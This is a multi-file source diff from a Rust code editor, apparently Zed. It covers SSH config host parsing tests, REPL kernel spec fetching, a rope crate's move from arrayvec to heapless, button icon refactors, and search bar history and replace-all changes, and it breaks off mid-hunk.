+ #[test]
+ fn falls_back_to_host_when_hostname_is_absent() {
+ let hosts = indoc! {"
+ Host github.com bitbucket.org keep-me
+ User git
+ "};
+
+ assert_eq!(
+ BTreeSet::from_iter(["keep-me".to_owned()]),
+ parse_ssh_config_hosts(hosts)
+ );
+ }
+
+ #[test]
+ fn does_not_fuzzy_match_host_aliases() {
+ let hosts = indoc! {"
+ Host GitHub GitLab Bitbucket GITHUB github
+ User git
+ "};
+
+ assert_eq!(
+ BTreeSet::from_iter([
+ "Bitbucket".to_owned(),
+ "GITHUB".to_owned(),
+ "GitHub".to_owned(),
+ "GitLab".to_owned(),
+ "github".to_owned(),
+ ]),
+ parse_ssh_config_hosts(hosts)
+ );
+ }
+
+ #[test]
+ fn uses_hostname_before_host_filtering() {
+ let hosts = indoc! {"
+ Host github.com keep-me
+ HostName example.com
+ "};
+
+ assert_eq!(
+ BTreeSet::from_iter(["github.com".to_owned(), "keep-me".to_owned()]),
+ parse_ssh_config_hosts(hosts)
+ );
+ }
}
@@ -2028,7 +2028,6 @@ async fn test_remote_external_agent_server(
.get_command(
HashMap::from_iter([("OTHER_VAR".into(), "other-val".into())]),
None,
- None,
&mut cx.to_async(),
)
})
@@ -431,10 +431,11 @@ impl PickerDelegate for KernelPickerDelegate {
.gap_4()
.child(
Button::new("kernel-docs", "Kernel Docs")
- .icon(IconName::ArrowUpRight)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted)
- .icon_position(IconPosition::End)
+ .end_icon(
+ Icon::new(IconName::ArrowUpRight)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.on_click(move |_, _, cx| cx.open_url(KERNEL_DOCS_URL)),
)
.into_any(),
@@ -503,11 +503,11 @@ pub fn python_env_kernel_specifications(
});
#[allow(unused_mut)]
- let mut kernel_specs: Vec<KernelSpecification> = futures::future::join_all(kernelspecs)
- .await
- .into_iter()
- .flatten()
- .collect();
+ let mut kernel_specs: Vec<KernelSpecification> = futures::stream::iter(kernelspecs)
+ .buffer_unordered(4)
+ .filter_map(|x| async move { x })
+ .collect::<Vec<_>>()
+ .await;
#[cfg(target_os = "windows")]
if kernel_specs.is_empty() && !is_remote {
@@ -1117,10 +1117,11 @@ impl NotebookEditor {
worktree_id,
Button::new("kernel-selector", kernel_name.clone())
.label_size(LabelSize::Small)
- .icon(status_icon)
- .icon_size(IconSize::Small)
- .icon_color(status_color)
- .icon_position(IconPosition::Start),
+ .start_icon(
+ Icon::new(status_icon)
+ .size(IconSize::Small)
+ .color(status_color),
+ ),
Tooltip::text(format!(
"Kernel: {} ({}). Click to change.",
kernel_name,
@@ -32,6 +32,7 @@ pub struct ReplStore {
kernel_specifications_for_worktree: HashMap<WorktreeId, Vec<KernelSpecification>>,
active_python_toolchain_for_worktree: HashMap<WorktreeId, SharedString>,
remote_worktrees: HashSet<WorktreeId>,
+ fetching_python_kernelspecs: HashSet<WorktreeId>,
_subscriptions: Vec<Subscription>,
}
@@ -66,6 +67,7 @@ impl ReplStore {
selected_kernel_for_worktree: HashMap::default(),
active_python_toolchain_for_worktree: HashMap::default(),
remote_worktrees: HashSet::default(),
+ fetching_python_kernelspecs: HashSet::default(),
};
this.on_enabled_changed(cx);
this
@@ -140,6 +142,10 @@ impl ReplStore {
project: &Entity<Project>,
cx: &mut Context<Self>,
) -> Task<Result<()>> {
+ if !self.fetching_python_kernelspecs.insert(worktree_id) {
+ return Task::ready(Ok(()));
+ }
+
let is_remote = project.read(cx).is_remote();
// WSL does require access to global kernel specs, so we only exclude remote worktrees that aren't WSL.
// TODO: a better way to handle WSL vs SSH/remote projects,
@@ -149,7 +155,7 @@ impl ReplStore {
.map_or(false, |opts| {
matches!(opts, RemoteConnectionOptions::Wsl(_))
});
- let kernel_specifications = python_env_kernel_specifications(project, worktree_id, cx);
+ let kernel_specifications_task = python_env_kernel_specifications(project, worktree_id, cx);
let active_toolchain = project.read(cx).active_toolchain(
ProjectPath {
worktree_id,
@@ -160,9 +166,15 @@ impl ReplStore {
);
cx.spawn(async move |this, cx| {
- let kernel_specifications = kernel_specifications
- .await
- .context("getting python kernelspecs")?;
+ let kernel_specifications_res = kernel_specifications_task.await;
+
+ this.update(cx, |this, _cx| {
+ this.fetching_python_kernelspecs.remove(&worktree_id);
+ })
+ .ok();
+
+ let kernel_specifications =
+ kernel_specifications_res.context("getting python kernelspecs")?;
let active_toolchain_path = active_toolchain.await.map(|toolchain| toolchain.path);
@@ -12,7 +12,7 @@ workspace = true
path = "src/rope.rs"
[dependencies]
-arrayvec = "0.7.1"
+heapless.workspace = true
log.workspace = true
rayon.workspace = true
sum_tree.workspace = true
@@ -1,5 +1,5 @@
use crate::{OffsetUtf16, Point, PointUtf16, TextSummary, Unclipped};
-use arrayvec::ArrayString;
+use heapless::String as ArrayString;
use std::{cmp, ops::Range};
use sum_tree::Bias;
use unicode_segmentation::GraphemeCursor;
@@ -29,7 +29,7 @@ pub struct Chunk {
newlines: Bitmap,
/// If bit[i] is set, then the character at index i is an ascii tab.
tabs: Bitmap,
- pub text: ArrayString<MAX_BASE>,
+ pub text: ArrayString<MAX_BASE, u8>,
}
#[inline(always)]
@@ -47,7 +47,11 @@ impl Chunk {
#[inline(always)]
pub fn new(text: &str) -> Self {
- let text = ArrayString::from(text).unwrap();
+ let text = {
+ let mut buf = ArrayString::new();
+ buf.push_str(text).unwrap();
+ buf
+ };
const CHUNK_SIZE: usize = 8;
@@ -118,7 +122,7 @@ impl Chunk {
self.chars_utf16 |= slice.chars_utf16 << base_ix;
self.newlines |= slice.newlines << base_ix;
self.tabs |= slice.tabs << base_ix;
- self.text.push_str(slice.text);
+ self.text.push_str(slice.text).unwrap();
}
#[inline(always)]
@@ -137,9 +141,9 @@ impl Chunk {
self.newlines = slice.newlines | (self.newlines << shift);
self.tabs = slice.tabs | (self.tabs << shift);
- let mut new_text = ArrayString::<MAX_BASE>::new();
- new_text.push_str(slice.text);
- new_text.push_str(&self.text);
+ let mut new_text = ArrayString::<MAX_BASE, u8>::new();
+ new_text.push_str(slice.text).unwrap();
+ new_text.push_str(&self.text).unwrap();
self.text = new_text;
}
@@ -4,7 +4,7 @@ mod point;
mod point_utf16;
mod unclipped;
-use arrayvec::ArrayVec;
+use heapless::Vec as ArrayVec;
use rayon::iter::{IntoParallelIterator, ParallelIterator as _};
use std::{
cmp, fmt, io, mem,
@@ -184,7 +184,7 @@ impl Rope {
return self.push_large(text);
}
// 16 is enough as otherwise we will hit the branch above
- let mut new_chunks = ArrayVec::<_, NUM_CHUNKS>::new();
+ let mut new_chunks = ArrayVec::<_, NUM_CHUNKS, u8>::new();
while !text.is_empty() {
let mut split_ix = cmp::min(chunk::MAX_BASE, text.len());
@@ -192,7 +192,7 @@ impl Rope {
split_ix -= 1;
}
let (chunk, remainder) = text.split_at(split_ix);
- new_chunks.push(chunk);
+ new_chunks.push(chunk).unwrap();
text = remainder;
}
self.chunks
@@ -699,6 +699,10 @@ impl<'a> Cursor<'a> {
self.offset,
end_offset
);
+ assert!(
+ end_offset <= self.rope.len(),
+ "cannot summarize past end of rope"
+ );
self.chunks.seek_forward(&end_offset, Bias::Right);
self.offset = end_offset;
@@ -711,6 +715,10 @@ impl<'a> Cursor<'a> {
self.offset,
end_offset
);
+ assert!(
+ end_offset <= self.rope.len(),
+ "cannot summarize past end of rope"
+ );
let mut slice = Rope::new();
if let Some(start_chunk) = self.chunks.item() {
@@ -741,6 +749,10 @@ impl<'a> Cursor<'a> {
self.offset,
end_offset
);
+ assert!(
+ end_offset <= self.rope.len(),
+ "cannot summarize past end of rope"
+ );
let mut summary = D::zero(());
if let Some(start_chunk) = self.chunks.item() {
@@ -15,7 +15,7 @@ use picker::{Picker, PickerDelegate};
use platform_title_bar::PlatformTitleBar;
use release_channel::ReleaseChannel;
use rope::Rope;
-use settings::Settings;
+use settings::{ActionSequence, Settings};
use std::rc::Rc;
use std::sync::Arc;
use std::sync::atomic::AtomicBool;
@@ -1159,10 +1159,11 @@ impl RulesLibrary {
Button::new("new-rule", "New Rule")
.full_width()
.style(ButtonStyle::Outlined)
- .icon(IconName::Plus)
- .icon_size(IconSize::Small)
- .icon_position(IconPosition::Start)
- .icon_color(Color::Muted)
+ .start_icon(
+ Icon::new(IconName::Plus)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.on_click(|_, window, cx| {
window.dispatch_action(Box::new(NewRule), cx);
}),
@@ -1398,6 +1399,13 @@ impl Render for RulesLibrary {
v_flex()
.id("rules-library")
.key_context("RulesLibrary")
+ .on_action(
+ |action_sequence: &ActionSequence, window: &mut Window, cx: &mut App| {
+ for action in &action_sequence.0 {
+ window.dispatch_action(action.boxed_clone(), cx);
+ }
+ },
+ )
.on_action(cx.listener(|this, &NewRule, window, cx| this.new_rule(window, cx)))
.on_action(
cx.listener(|this, &DeleteRule, window, cx| {
@@ -31,6 +31,7 @@ futures.workspace = true
gpui.workspace = true
language.workspace = true
menu.workspace = true
+multi_buffer.workspace = true
project.workspace = true
serde.workspace = true
serde_json.workspace = true
@@ -6,8 +6,9 @@ use crate::{
ToggleCaseSensitive, ToggleRegex, ToggleReplace, ToggleSelection, ToggleWholeWord,
buffer_search::registrar::WithResultsOrExternalQuery,
search_bar::{
- ActionButtonState, alignment_element, filter_search_results_input, input_base_styles,
- render_action_button, render_text_input,
+ ActionButtonState, HistoryNavigationDirection, alignment_element,
+ filter_search_results_input, input_base_styles, render_action_button, render_text_input,
+ should_navigate_history,
},
};
use any_vec::AnyVec;
@@ -15,6 +16,7 @@ use collections::HashMap;
use editor::{
Editor, EditorSettings, MultiBufferOffset, SplittableEditor, ToggleSplitDiff,
actions::{Backtab, FoldAll, Tab, ToggleFoldAll, UnfoldAll},
+ scroll::Autoscroll,
};
use futures::channel::oneshot;
use gpui::{
@@ -337,13 +339,11 @@ impl Render for BufferSearchBar {
};
let query_column = input_style
- .child(
- div()
- .flex_1()
- .min_w(px(0.))
- .overflow_hidden()
- .child(render_text_input(&self.query_editor, color_override, cx)),
- )
+ .child(div().flex_1().min_w_0().py_1().child(render_text_input(
+ &self.query_editor,
+ color_override,
+ cx,
+ )))
.child(
h_flex()
.flex_none()
@@ -484,39 +484,42 @@ impl Render for BufferSearchBar {
.child(query_column)
.child(mode_column);
- let replace_line =
- should_show_replace_input.then(|| {
- let replace_column = input_base_styles(replacement_border)
- .child(render_text_input(&self.replacement_editor, None, cx));
- let focus_handle = self.replacement_editor.read(cx).focus_handle(cx);
-
- let replace_actions = h_flex()
- .min_w_64()
- .gap_1()
- .child(render_action_button(
- "buffer-search-replace-button",
- IconName::ReplaceNext,
- Default::default(),
- "Replace Next Match",
- &ReplaceNext,
- focus_handle.clone(),
- ))
- .child(render_action_button(
- "buffer-search-replace-button",
- IconName::ReplaceAll,
- Default::default(),
- "Replace All Matches",
- &ReplaceAll,
- focus_handle,
- ));
+ let replace_line = should_show_replace_input.then(|| {
+ let replace_column = input_base_styles(replacement_border).child(
+ div()
+ .flex_1()
+ .py_1()
+ .child(render_text_input(&self.replacement_editor, None, cx)),
+ );
+ let focus_handle = self.replacement_editor.read(cx).focus_handle(cx);
+
+ let replace_actions = h_flex()
+ .min_w_64()
+ .gap_1()
+ .child(render_action_button(
+ "buffer-search-replace-button",
+ IconName::ReplaceNext,
+ Default::default(),
+ "Replace Next Match",
+ &ReplaceNext,
+ focus_handle.clone(),
+ ))
+ .child(render_action_button(
+ "buffer-search-replace-button",
+ IconName::ReplaceAll,
+ Default::default(),
+ "Replace All Matches",
+ &ReplaceAll,
+ focus_handle,
+ ));
- h_flex()
- .w_full()
- .gap_2()
- .when(has_collapse_button, |this| this.child(alignment_element()))
- .child(replace_column)
- .child(replace_actions)
- });
+ h_flex()
+ .w_full()
+ .gap_2()
+ .when(has_collapse_button, |this| this.child(alignment_element()))
+ .child(replace_column)
+ .child(replace_actions)
+ });
let mut key_context = KeyContext::new_with_defaults();
key_context.add("BufferSearchBar");
@@ -831,13 +834,13 @@ impl BufferSearchBar {
cx: &mut Context<Self>,
) -> Self {
let query_editor = cx.new(|cx| {
- let mut editor = Editor::single_line(window, cx);
+ let mut editor = Editor::auto_height(1, 4, window, cx);
editor.set_use_autoclose(false);
editor
});
cx.subscribe_in(&query_editor, window, Self::on_query_editor_event)
.detach();
- let replacement_editor = cx.new(|cx| Editor::single_line(window, cx));
+ let replacement_editor = cx.new(|cx| Editor::auto_height(1, 4, window, cx));
cx.subscribe(&replacement_editor, Self::on_replacement_editor_event)
.detach();
@@ -973,7 +976,9 @@ impl BufferSearchBar {
if deploy.focus {
let mut handle = self.query_editor.focus_handle(cx);
let mut select_query = true;
- if deploy.replace_enabled && handle.is_focused(window) {
+
+ let has_seed_text = self.query_suggestion(window, cx).is_some();
+ if deploy.replace_enabled && has_seed_text {
handle = self.replacement_editor.focus_handle(cx);
select_query = false;
};
@@ -1186,6 +1191,7 @@ impl BufferSearchBar {
let len = query_buffer.len(cx);
query_buffer.edit([(MultiBufferOffset(0)..len, query)], None, cx);
});
+ query_editor.request_autoscroll(Autoscroll::fit(), cx);
});
self.set_search_options(options, cx);
self.clear_matches(window, cx);
@@ -1704,15 +1710,19 @@ impl BufferSearchBar {
window: &mut Window,
cx: &mut Context<Self>,
) {
+ if !should_navigate_history(&self.query_editor, HistoryNavigationDirection::Next, cx) {
+ cx.propagate();
+ return;
+ }
+
if let Some(new_query) = self
.search_history
.next(&mut self.search_history_cursor)
.map(str::to_string)
{
drop(self.search(&new_query, Some(self.search_options), false, window, cx));
- } else {
- self.search_history_cursor.reset();
- drop(self.search("", Some(self.search_options), false, window, cx));
+ } else if let Some(draft) = self.search_history_cursor.take_draft() {
+ drop(self.search(&draft, Some(self.search_options), false, window, cx));
}
}
@@ -1722,6 +1732,11 @@ impl BufferSearchBar {
window: &mut Window,
cx: &mut Context<Self>,
) {
+ if !should_navigate_history(&self.query_editor, HistoryNavigationDirection::Previous, cx) {
+ cx.propagate();
+ return;
+ }
+
if self.query(cx).is_empty()
&& let Some(new_query) = self
.search_history
@@ -1732,9 +1747,10 @@ impl BufferSearchBar {
return;
}
+ let current_query = self.query(cx);
if let Some(new_query) = self
.search_history
- .previous(&mut self.search_history_cursor)
+ .previous(&mut self.search_history_cursor, ¤t_query)
.map(str::to_string)
{
drop(self.search(&new_query, Some(self.search_options), false, window, cx));
@@ -2716,13 +2732,13 @@ mod tests {
assert_eq!(search_bar.search_options, SearchOptions::CASE_SENSITIVE);
});
- // Next history query after the latest should set the query to the empty string.
+ // Next history query after the latest should preserve the current query.
search_bar.update_in(cx, |search_bar, window, cx| {
search_bar.next_history_query(&NextHistoryQuery, window, cx);
});
cx.background_executor.run_until_parked();
search_bar.update(cx, |search_bar, cx| {
- assert_eq!(search_bar.query(cx), "");
+ assert_eq!(search_bar.query(cx), "c");
assert_eq!(search_bar.search_options, SearchOptions::CASE_SENSITIVE);
});
search_bar.update_in(cx, |search_bar, window, cx| {
@@ -2730,17 +2746,17 @@ mod tests {
});
cx.background_executor.run_until_parked();
search_bar.update(cx, |search_bar, cx| {
- assert_eq!(search_bar.query(cx), "");
+ assert_eq!(search_bar.query(cx), "c");
assert_eq!(search_bar.search_options, SearchOptions::CASE_SENSITIVE);
});
- // First previous query for empty current query should set the query to the latest.
+ // Previous query should navigate backwards through history.
search_bar.update_in(cx, |search_bar, window, cx| {
search_bar.previous_history_query(&PreviousHistoryQuery, window, cx);
});
cx.background_executor.run_until_parked();
search_bar.update(cx, |search_bar, cx| {
- assert_eq!(search_bar.query(cx), "c");
+ assert_eq!(search_bar.query(cx), "b");
assert_eq!(search_bar.search_options, SearchOptions::CASE_SENSITIVE);
});
@@ -2750,7 +2766,7 @@ mod tests {
});
cx.background_executor.run_until_parked();
search_bar.update(cx, |search_bar, cx| {
- assert_eq!(search_bar.query(cx), "b");
+ assert_eq!(search_bar.query(cx), "a");
assert_eq!(search_bar.search_options, SearchOptions::CASE_SENSITIVE);
});
@@ -2831,11 +2847,71 @@ mod tests {
});
cx.background_executor.run_until_parked();
search_bar.update(cx, |search_bar, cx| {
- assert_eq!(search_bar.query(cx), "");
+ assert_eq!(search_bar.query(cx), "ba");
assert_eq!(search_bar.search_options, SearchOptions::NONE);
});
}
+ #[perf]
+ #[gpui::test]
+ async fn test_search_query_history_autoscroll(cx: &mut TestAppContext) {
+ let (_editor, search_bar, cx) = init_test(cx);
+
+ // Add a long multi-line query that exceeds the editor's max
+ // visible height (4 lines), then a short query.
+ let long_query = "line1\nline2\nline3\nline4\nline5\nline6";
+ search_bar
+ .update_in(cx, |search_bar, window, cx| {
+ search_bar.search(long_query, None, true, window, cx)
+ })
+ .await
+ .unwrap();
+ search_bar
+ .update_in(cx, |search_bar, window, cx| {
+ search_bar.search("short", None, true, window, cx)
+ })
+ .await
+ .unwrap();
+
+ // Navigate back to the long entry. Since "short" is single-line,
+ // the history navigation is allowed.
+ search_bar.update_in(cx, |search_bar, window, cx| {
+ search_bar.previous_history_query(&PreviousHistoryQuery, window, cx);
+ });
+ cx.background_executor.run_until_parked();
+ search_bar.update(cx, |search_bar, cx| {
+ assert_eq!(search_bar.query(cx), long_query);
+ });
+
+ // The cursor should be scrolled into view despite the content
+ // exceeding the editor's max visible height.
+ search_bar.update_in(cx, |search_bar, window, cx| {
+ let snapshot = search_bar
+ .query_editor
+ .update(cx, |editor, cx| editor.snapshot(window, cx));
+ let cursor_row = search_bar
+ .query_editor
+ .read(cx)
+ .selections
+ .newest_display(&snapshot)
+ .head()
+ .row();
+ let scroll_top = search_bar
+ .query_editor
+ .update(cx, |editor, cx| editor.scroll_position(cx).y);
+ let visible_lines = search_bar
+ .query_editor
+ .read(cx)
+ .visible_line_count()
+ .unwrap_or(0.0);
+ let scroll_bottom = scroll_top + visible_lines;
+ assert!(
+ (cursor_row.0 as f64) < scroll_bottom,
+ "cursor row {cursor_row:?} should be visible (scroll range {scroll_top}..{scroll_bottom})"
+ );
+ });
+ }
+
#[perf]
#[gpui::test]
async fn test_replace_simple(cx: &mut TestAppContext) {
@@ -3114,6 +3190,47 @@ mod tests {
.await;
}
+ #[gpui::test]
+ async fn test_deploy_replace_focuses_replacement_editor(cx: &mut TestAppContext) {
+ init_globals(cx);
+ let (editor, search_bar, cx) = init_test(cx);
+
+ editor.update_in(cx, |editor, window, cx| {
+ editor.change_selections(SelectionEffects::no_scroll(), window, cx, |s| {
+ s.select_display_ranges([
+ DisplayPoint::new(DisplayRow(0), 8)..DisplayPoint::new(DisplayRow(0), 16)
+ ])
+ });
+ });
+
+ search_bar.update_in(cx, |search_bar, window, cx| {
+ search_bar.deploy(
+ &Deploy {
+ focus: true,
+ replace_enabled: true,
+ selection_search_enabled: false,
+ },
+ window,
+ cx,
+ );
+ });
+ cx.run_until_parked();
+
+ search_bar.update_in(cx, |search_bar, window, cx| {
+ assert!(
+ search_bar
+ .replacement_editor
+ .focus_handle(cx)
+ .is_focused(window),
+ "replacement editor should be focused when deploying replace with a selection",
+ );
+ assert!(
+ !search_bar.query_editor.focus_handle(cx).is_focused(window),
+ "search editor should not be focused when replacement editor is focused",
+ );
+ });
+ }
+
#[perf]
#[gpui::test]
async fn test_find_matches_in_selections_singleton_buffer_multiple_selections(
@@ -4,15 +4,15 @@ use crate::{
ToggleCaseSensitive, ToggleIncludeIgnored, ToggleRegex, ToggleReplace, ToggleWholeWord,
buffer_search::Deploy,
search_bar::{
- ActionButtonState, alignment_element, input_base_styles, render_action_button,
- render_text_input,
+ ActionButtonState, HistoryNavigationDirection, alignment_element, input_base_styles,
+ render_action_button, render_text_input, should_navigate_history,
},
};
use anyhow::Context as _;
use collections::HashMap;
use editor::{
- Anchor, Editor, EditorEvent, EditorSettings, MAX_TAB_TITLE_LEN, MultiBuffer, PathKey,
- SelectionEffects,
+ Anchor, Editor, EditorEvent, EditorSettings, ExcerptId, MAX_TAB_TITLE_LEN, MultiBuffer,
+ PathKey, SelectionEffects,
actions::{Backtab, FoldAll, SelectAll, Tab, UnfoldAll},
items::active_match_index,
multibuffer_context_lines,
@@ -27,6 +27,7 @@ use gpui::{
use itertools::Itertools;
use language::{Buffer, Language};
use menu::Confirm;
+use multi_buffer;
use project::{
Project, ProjectPath, SearchResults,
search::{SearchInputKind, SearchQuery},
@@ -239,6 +240,7 @@ pub struct ProjectSearch {
search_history_cursor: SearchHistoryCursor,
search_included_history_cursor: SearchHistoryCursor,
search_excluded_history_cursor: SearchHistoryCursor,
+ _excerpts_subscription: Subscription,
}
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)]
@@ -264,6 +266,7 @@ pub struct ProjectSearchView {
excluded_files_editor: Entity<Editor>,
filters_enabled: bool,
replace_enabled: bool,
+ pending_replace_all: bool,
included_opened_only: bool,
regex_language: Option<Arc<Language>>,
_subscriptions: Vec<Subscription>,
@@ -283,10 +286,12 @@ pub struct ProjectSearchBar {
impl ProjectSearch {
pub fn new(project: Entity<Project>, cx: &mut Context<Self>) -> Self {
let capability = project.read(cx).capability();
+ let excerpts = cx.new(|_| MultiBuffer::new(capability));
+ let subscription = Self::subscribe_to_excerpts(&excerpts, cx);
Self {
project,
- excerpts: cx.new(|_| MultiBuffer::new(capability)),
+ excerpts,
pending_search: Default::default(),
match_ranges: Default::default(),
active_query: None,
@@ -297,27 +302,85 @@ impl ProjectSearch {
search_history_cursor: Default::default(),
search_included_history_cursor: Default::default(),
search_excluded_history_cursor: Default::default(),
+ _excerpts_subscription: subscription,
}
}
fn clone(&self, cx: &mut Context<Self>) -> Entity<Self> {
- cx.new(|cx| Self {
- project: self.project.clone(),
- excerpts: self
+ cx.new(|cx| {
+ let excerpts = self
.excerpts
- .update(cx, |excerpts, cx| cx.new(|cx| excerpts.clone(cx))),
- pending_search: Default::default(),
- match_ranges: self.match_ranges.clone(),
- active_query: self.active_query.clone(),
- last_search_query_text: self.last_search_query_text.clone(),
- search_id: self.search_id,
- no_results: self.no_results,
- limit_reached: self.limit_reached,
- search_history_cursor: self.search_history_cursor.clone(),
- search_included_history_cursor: self.search_included_history_cursor.clone(),
- search_excluded_history_cursor: self.search_excluded_history_cursor.clone(),
+ .update(cx, |excerpts, cx| cx.new(|cx| excerpts.clone(cx)));
+ let subscription = Self::subscribe_to_excerpts(&excerpts, cx);
+
+ Self {
+ project: self.project.clone(),
+ excerpts,
+ pending_search: Default::default(),
+ match_ranges: self.match_ranges.clone(),
+ active_query: self.active_query.clone(),
+ last_search_query_text: self.last_search_query_text.clone(),
+ search_id: self.search_id,
+ no_results: self.no_results,
+ limit_reached: self.limit_reached,
+ search_history_cursor: self.search_history_cursor.clone(),
+ search_included_history_cursor: self.search_included_history_cursor.clone(),
+ search_excluded_history_cursor: self.search_excluded_history_cursor.clone(),
+ _excerpts_subscription: subscription,
+ }
+ })
+ }
+ fn subscribe_to_excerpts(
+ excerpts: &Entity<MultiBuffer>,
+ cx: &mut Context<Self>,
+ ) -> Subscription {
+ cx.subscribe(excerpts, |this, _, event, cx| {
+ if matches!(event, multi_buffer::Event::FileHandleChanged) {
+ this.remove_deleted_buffers(cx);
+ }
})
}
+
+ fn remove_deleted_buffers(&mut self, cx: &mut Context<Self>) {
+ let (deleted_paths, removed_excerpt_ids) = {
+ let excerpts = self.excerpts.read(cx);
+ let deleted_paths: Vec<PathKey> = excerpts
+ .paths()
+ .filter(|path| {
+ excerpts.buffer_for_path(path, cx).is_some_and(|buffer| {
+ buffer
+ .read(cx)
+ .file()
+ .is_some_and(|file| file.disk_state().is_deleted())
+ })
+ })
+ .cloned()
+ .collect();
+
+ let removed_excerpt_ids: collections::HashSet<ExcerptId> = deleted_paths
+ .iter()
+ .flat_map(|path| excerpts.excerpts_for_path(path))
+ .collect();
+
+ (deleted_paths, removed_excerpt_ids)
+ };
+
+ if deleted_paths.is_empty() {
+ return;
+ }
+
+ self.excerpts.update(cx, |excerpts, cx| {
+ for path in deleted_paths {
+ excerpts.remove_excerpts_for_path(path, cx);
+ }
+ });
+
+ self.match_ranges
+ .retain(|range| !removed_excerpt_ids.contains(&range.start.excerpt_id));
+
+ cx.notify();
+ }
+
fn cursor(&self, kind: SearchInputKind) -> &SearchHistoryCursor {
match kind {
SearchInputKind::Query => &self.search_history_cursor,
@@ -735,6 +798,9 @@ impl ProjectSearchView {
}
fn replace_next(&mut self, _: &ReplaceNext, window: &mut Window, cx: &mut Context<Self>) {
+ if self.entity.read(cx).pending_search.is_some() {
+ return;
+ }
if let Some(last_search_query_text) = &self.entity.read(cx).last_search_query_text
&& self.query_editor.read(cx).text(cx) != *last_search_query_text
{
@@ -762,14 +828,24 @@ impl ProjectSearchView {
self.select_match(Direction::Next, window, cx)
}
}
+
fn replace_all(&mut self, _: &ReplaceAll, window: &mut Window, cx: &mut Context<Self>) {
- if let Some(last_search_query_text) = &self.entity.read(cx).last_search_query_text
- && self.query_editor.read(cx).text(cx) != *last_search_query_text
- {
- // search query has changed, restart search and bail
+ if self.entity.read(cx).pending_search.is_some() {
+ self.pending_replace_all = true;
+ return;
+ }
+ let query_text = self.query_editor.read(cx).text(cx);
+ let query_is_stale =
+ self.entity.read(cx).last_search_query_text.as_deref() != Some(query_text.as_str());
+ if query_is_stale {
+ self.pending_replace_all = true;
self.search(cx);
+ if self.entity.read(cx).pending_search.is_none() {
+ self.pending_replace_all = false;
+ }
return;
}
+ self.pending_replace_all = false;
if self.active_match_index.is_none() {
return;
}
@@ -858,7 +934,7 @@ impl ProjectSearchView {
}));
let query_editor = cx.new(|cx| {
- let mut editor = Editor::single_line(window, cx);
+ let mut editor = Editor::auto_height(1, 4, window, cx);
editor.set_placeholder_text("Search all files…", window, cx);
editor.set_text(query_text, window, cx);
editor
@@ -881,7 +957,7 @@ impl ProjectSearchView {
}),
);
let replacement_editor = cx.new(|cx| {
- let mut editor = Editor::single_line(window, cx);
+ let mut editor = Editor::auto_height(1, 4, window, cx);
editor.set_placeholder_text("Replace in project…", window, cx);
if let Some(text) = replacement_text {
editor.set_text(text, window, cx);
@@ -981,6 +1057,7 @@ impl ProjectSearchView {
excluded_files_editor,
filters_enabled,
replace_enabled: false,
+ pending_replace_all: false,
included_opened_only: false,
regex_language: None,
_subscriptions: subscriptions,
@@ -1474,8 +1551,9 @@ impl ProjectSearchView {
SearchInputKind::Exclude => &self.excluded_files_editor,
};
- editor.update(cx, |included_editor, cx| {
- included_editor.set_text(text, window, cx)
+ editor.update(cx, |editor, cx| {
+ editor.set_text(text, window, cx);
+ editor.request_autoscroll(Autoscroll::fit(), cx);
});
}
@@ -1521,6 +1599,10 @@ impl ProjectSearchView {
cx.emit(ViewEvent::UpdateTab);
cx.notify();
+
+ if self.pending_replace_all && self.entity.read(cx).pending_search.is_none() {
+ self.replace_all(&ReplaceAll, window, cx);
+ }
}
fn update_match_index(&mut self, cx: &mut Context<Self>) {
@@ -1583,9 +1665,7 @@ impl ProjectSearchView {
)
.child(
Button::new("filter-paths", "Include/exclude specific paths")
- .icon(IconName::Filter)
- .icon_position(IconPosition::Start)
- .icon_size(IconSize::Small)
+ .start_icon(Icon::new(IconName::Filter).size(IconSize::Small))
.key_binding(KeyBinding::for_action_in(&ToggleFilters, &focus_handle, cx))
.on_click(|_event, window, cx| {
window.dispatch_action(ToggleFilters.boxed_clone(), cx)
@@ -1593,9 +1673,7 @@ impl ProjectSearchView {
)
.child(
Button::new("find-replace", "Find and replace")
- .icon(IconName::Replace)
- .icon_position(IconPosition::Start)
- .icon_size(IconSize::Small)
+ .start_icon(Icon::new(IconName::Replace).size(IconSize::Small))
.key_binding(KeyBinding::for_action_in(&ToggleReplace, &focus_handle, cx))
.on_click(|_event, window, cx| {
window.dispatch_action(ToggleReplace.boxed_clone(), cx)
@@ -1603,9 +1681,7 @@ impl ProjectSearchView {
)
.child(
Button::new("regex", "Match with regex")
- .icon(IconName::Regex)
- .icon_position(IconPosition::Start)
- .icon_size(IconSize::Small)
+ .start_icon(Icon::new(IconName::Regex).size(IconSize::Small))
.key_binding(KeyBinding::for_action_in(&ToggleRegex, &focus_handle, cx))
.on_click(|_event, window, cx| {
window.dispatch_action(ToggleRegex.boxed_clone(), cx)
@@ -1613,9 +1689,7 @@ impl ProjectSearchView {
)
.child(
Button::new("match-case", "Match case")
- .icon(IconName::CaseSensitive)
- .icon_position(IconPosition::Start)
- .icon_size(IconSize::Small)
+ .start_icon(Icon::new(IconName::CaseSensitive).size(IconSize::Small))
.key_binding(KeyBinding::for_action_in(
&ToggleCaseSensitive,
&focus_handle,
@@ -1627,9 +1701,7 @@ impl ProjectSearchView {
)
.child(
Button::new("match-whole-words", "Match whole words")
- .icon(IconName::WholeWord)
- .icon_position(IconPosition::Start)
- .icon_size(IconSize::Small)
+ .start_icon(Icon::new(IconName::WholeWord).size(IconSize::Small))
.key_binding(KeyBinding::for_action_in(
&ToggleWholeWord,
&focus_handle,
@@ -1926,6 +1998,11 @@ impl ProjectSearchBar {
),
] {
if editor.focus_handle(cx).is_focused(window) {
+ if !should_navigate_history(&editor, HistoryNavigationDirection::Next, cx) {
+ cx.propagate();
+ return;
+ }
+
let new_query = search_view.entity.update(cx, |model, cx| {
let project = model.project.clone();
@@ -1935,13 +2012,14 @@ impl ProjectSearchBar {
.next(model.cursor_mut(kind))
.map(str::to_string)
}) {
- new_query
+ Some(new_query)
} else {
- model.cursor_mut(kind).reset();
- String::new()
+ model.cursor_mut(kind).take_draft()
}
});
- search_view.set_search_editor(kind, &new_query, window, cx);
+ if let Some(new_query) = new_query {
+ search_view.set_search_editor(kind, &new_query, window, cx);
+ }
}
}
});
@@ -1968,6 +2046,15 @@ impl ProjectSearchBar {
),
] {
if editor.focus_handle(cx).is_focused(window) {
+ if !should_navigate_history(
+ &editor,
+ HistoryNavigationDirection::Previous,
+ cx,
+ ) {
